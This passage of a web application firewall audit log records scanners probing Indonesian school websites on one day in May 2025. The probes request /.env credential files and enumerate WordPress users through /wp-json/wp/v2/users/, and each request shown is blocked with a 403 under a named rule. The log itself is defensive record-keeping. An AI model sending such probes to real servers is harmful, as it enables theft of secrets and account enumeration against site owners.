REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748108108257432 3277 (- - -) Stopwatch2: 1748108108257432 3277; combined=1484, p1=501, p2=945, p3=0, p4=0, p5=38, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ef6725e-Z-- --679e7242-A-- [25/May/2025:02:27:24 +0700] aDIdnDvI5DIWBJ2mFG5nMQAAANM 103.236.140.4 59872 103.236.140.4 8181 --679e7242-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.212.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.212.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; RMX1851) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --679e7242-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --679e7242-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748114844524463 734 (- - -) Stopwatch2: 1748114844524463 734; combined=310, p1=270, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --679e7242-Z-- --eef63f4f-A-- [25/May/2025:02:33:03 +0700] aDIe7_mzt4abyoi_U9kebwAAAI8 103.236.140.4 60170 103.236.140.4 8181 --eef63f4f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.238.47.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.238.47.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eef63f4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eef63f4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748115183938446 3074 (- - -) Stopwatch2: 1748115183938446 3074; combined=1373, p1=446, p2=896, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eef63f4f-Z-- --d67cd01d-A-- [25/May/2025:02:39:15 +0700] aDIgY_mzt4abyoi_U9kegQAAAIE 103.236.140.4 60444 103.236.140.4 8181 --d67cd01d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 91.108.138.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 91.108.138.249 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d67cd01d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d67cd01d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748115555127802 3132 (- - -) Stopwatch2: 1748115555127802 3132; combined=1306, p1=474, p2=799, p3=0, p4=0, p5=32, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d67cd01d-Z-- --d9cfb860-A-- [25/May/2025:02:42:28 +0700] aDIhJOO2UzDOKMmK0i66VwAAAAg 103.236.140.4 60550 103.236.140.4 8181 --d9cfb860-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.79.135.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.79.135.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d9cfb860-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9cfb860-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748115748351792 3067 (- - -) Stopwatch2: 1748115748351792 3067; combined=1310, p1=473, p2=805, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9cfb860-Z-- --980ee607-A-- [25/May/2025:02:43:30 +0700] aDIhYjvI5DIWBJ2mFG5nWQAAAMM 103.236.140.4 60586 103.236.140.4 8181 --980ee607-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.248.20.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.248.20.42 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --980ee607-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --980ee607-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748115810383077 905 (- - -) Stopwatch2: 1748115810383077 905; combined=379, p1=328, p2=0, p3=0, p4=0, p5=51, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --980ee607-Z-- --2175ae5a-A-- [25/May/2025:03:39:23 +0700] aDIue-unkxaVeh4NwhbwAQAAAFI 103.236.140.4 33646 103.236.140.4 8181 --2175ae5a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.221.4.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.221.4.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2175ae5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2175ae5a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748119163162335 7764 (- - -) Stopwatch2: 1748119163162335 7764; combined=6033, p1=1345, p2=4649, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2175ae5a-Z-- --576d6125-A-- [25/May/2025:03:49:07 +0700] aDIww9erygsLmB9N_YQZHAAAAIo 103.236.140.4 34530 103.236.140.4 8181 --576d6125-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.56.220.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.56.220.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --576d6125-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --576d6125-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748119747756830 2615 (- - -) Stopwatch2: 1748119747756830 2615; combined=1360, p1=422, p2=908, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --576d6125-Z-- --748bfc08-A-- [25/May/2025:04:13:03 +0700] aDI2X9erygsLmB9N_YQbAwAAAI0 103.236.140.4 36090 103.236.140.4 8181 --748bfc08-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.248.173.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.248.173.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --748bfc08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --748bfc08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748121183495693 3538 (- - -) Stopwatch2: 1748121183495693 3538; combined=1539, p1=551, p2=951, p3=0, p4=0, p5=37, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --748bfc08-Z-- --0402774b-A-- [25/May/2025:04:19:33 +0700] aDI35derygsLmB9N_YQbSwAAAIo 103.236.140.4 36318 103.236.140.4 8181 --0402774b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Accept-Charset: utf-8 --0402774b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0402774b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748121573878126 841 (- - -) Stopwatch2: 1748121573878126 841; combined=365, p1=320, p2=0, p3=0, p4=0, p5=45, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0402774b-Z-- --32695c0d-A-- [25/May/2025:04:19:38 +0700] aDI36terygsLmB9N_YQbTAAAAJA 103.236.140.4 36320 103.236.140.4 8181 --32695c0d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; BOLT/2.800) AppleWebKit/534.6 (KHTML, like Gecko) Version/5.0 Safari/534.6.3 Accept-Charset: utf-8 --32695c0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32695c0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748121578177474 639 (- - -) Stopwatch2: 1748121578177474 639; combined=248, p1=215, p2=0, p3=0, p4=0, p5=32, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32695c0d-Z-- --f8277a15-A-- [25/May/2025:04:36:19 +0700] aDI709erygsLmB9N_YQbwgAAAJM 103.236.140.4 36924 103.236.140.4 8181 --f8277a15-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.80.184.71 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 45.80.184.71 Accept-Encoding: gzip X-Varnish: 168772844 --f8277a15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f8277a15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748122579341600 770 (- - -) Stopwatch2: 1748122579341600 770; combined=285, p1=249, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8277a15-Z-- --1d19fb55-A-- [25/May/2025:04:46:02 +0700] aDI-GterygsLmB9N_YQcFgAAAJI 103.236.140.4 37392 103.236.140.4 8181 --1d19fb55-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.204.149.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.204.149.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1d19fb55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d19fb55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748123162350856 3564 (- - -) Stopwatch2: 1748123162350856 3564; combined=1599, p1=611, p2=957, p3=0, p4=0, p5=31, sr=201, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d19fb55-Z-- --0f52343e-A-- [25/May/2025:04:48:08 +0700] aDI-mNerygsLmB9N_YQcNAAAAJg 103.236.140.4 37484 103.236.140.4 8181 --0f52343e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.69.145.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.69.145.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0f52343e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f52343e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748123288225246 2832 (- - -) Stopwatch2: 1748123288225246 2832; combined=1254, p1=425, p2=798, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f52343e-Z-- --ba10b712-A-- [25/May/2025:06:02:35 +0700] aDJQC3awJq5017Xs8D6X5AAAANI 103.236.140.4 40916 103.236.140.4 8181 --ba10b712-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.241.208.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.241.208.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ba10b712-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba10b712-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748127755953482 3329 (- - -) Stopwatch2: 1748127755953482 3329; combined=1439, p1=479, p2=928, p3=0, p4=0, p5=31, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba10b712-Z-- --87959551-A-- [25/May/2025:06:42:38 +0700] aDJZbterygsLmB9N_YQnRQAAAII 103.236.140.4 44170 103.236.140.4 8181 --87959551-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 13.250.163.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 13.250.163.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --87959551-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87959551-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748130158508789 2481 (- - -) Stopwatch2: 1748130158508789 2481; combined=1171, p1=383, p2=760, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87959551-Z-- --f31d2823-A-- [25/May/2025:06:45:41 +0700] aDJaJderygsLmB9N_YQnUAAAAJc 103.236.140.4 44292 103.236.140.4 8181 --f31d2823-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 175.100.17.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 175.100.17.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f31d2823-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f31d2823-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748130341570618 2809 (- - -) Stopwatch2: 1748130341570618 2809; combined=1274, p1=415, p2=829, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f31d2823-Z-- --6148fe04-A-- [25/May/2025:06:50:38 +0700] aDJbTnP6UgzLD1l8HTrNpwAAABc 103.236.140.4 44416 103.236.140.4 8181 --6148fe04-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML like Gecko) Maxthon/4.0.0.2000 Chrome/22.0.1229.79 Safari/537.1 Accept-Charset: utf-8 --6148fe04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6148fe04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748130638664939 779 (- - -) Stopwatch2: 1748130638664939 779; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
